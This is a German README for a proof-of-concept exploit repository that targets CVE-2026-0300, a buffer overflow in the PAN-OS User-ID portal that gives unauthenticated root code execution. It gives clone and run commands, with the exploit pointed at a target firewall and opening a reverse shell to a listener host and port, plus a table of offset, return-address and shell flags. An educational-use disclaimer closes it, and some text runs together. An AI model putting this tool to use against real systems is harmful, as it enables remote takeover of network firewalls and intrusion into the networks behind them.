
Proof-of-Concept für CVE-2026-0300, einen kritischen Pufferüberlauf im PAN-OS User-ID-Portal, der eine nicht authentifizierte Remote-Codeausführung mit Root-Rechten ermöglicht.
CVE-2026-0300 ist eine schwerwiegende Pufferüberlauf-Schwachstelle, die im Palo Alto Networks PAN-OS User-ID™-Authentifizierungsportal (Captive Portal) identifiziert wurde. Dieses Forschungs-Repository demonstriert die technische Logik der Schwachstelle und konzentriert sich insbesondere darauf, wie ein nicht authentifiziertes Netzwerkpaket zu Remote Code Execution (RCE) mit Root-Rechten führen kann.
| Merkmal | Details |
|---|---|
| CVE-ID | CVE-2026-0300 |
| Schweregrad-Score | 9.3 (Kritisch) |
| Schwachstellentyp | CWE-787: Out-of-bounds Write |
| Angriffsvektor | Netzwerk (Nicht authentifiziert) |
| Erforderliche Privilegien | Keine |
| Benutzerinteraktion | Keine |
| Betroffene Software | PAN-OS 12.1, 11.2, 11.1, 10.2 |
Die Schwachstelle tritt auf, wenn der Dienst des User-ID-Authentifizierungsportals die Länge eingehender Daten vor dem Schreiben in einen Speicherpuffer nicht validiert.
socket, struct und argparse).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Dieses Tool ist mit einer professionellen CLI (Command Line Interface) ausgestattet.
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| Flag | Name | Beschreibung | Standard |
|---|---|---|---|
| -t | --target | (Erforderlich) Ziel-IP-Adresse der Firewall. | N/A |
| -p | --port | Der Port, auf dem das User-ID-Portal läuft. | 6082 |
| -o | --offset | Die Bytelänge, um den Speicherüberlaufpunkt zu erreichen. | 2048 |
| -r | --ret | Die hexadezimale Rücksprungadresse. | 0xdeadbeef |
| -l | --lhost | Reverse-Shell-IP-Adresse | Ihre IP |
| -L | --lport | Ihr Listener-Port | 4444 |
NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE FORSCHUNG. Nicht autorisierte Tests gegen Systeme, die Ihnen nicht gehören, sind illegal. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Forschungscodes. Verwenden Sie ihn verantwortungsvoll, um die globale Sicherheit zu verbessern. Entwickelt von: https://t.me/p3Nt3st3rsTAr Datum der Schwachstellenentdeckung: 07. Mai 2026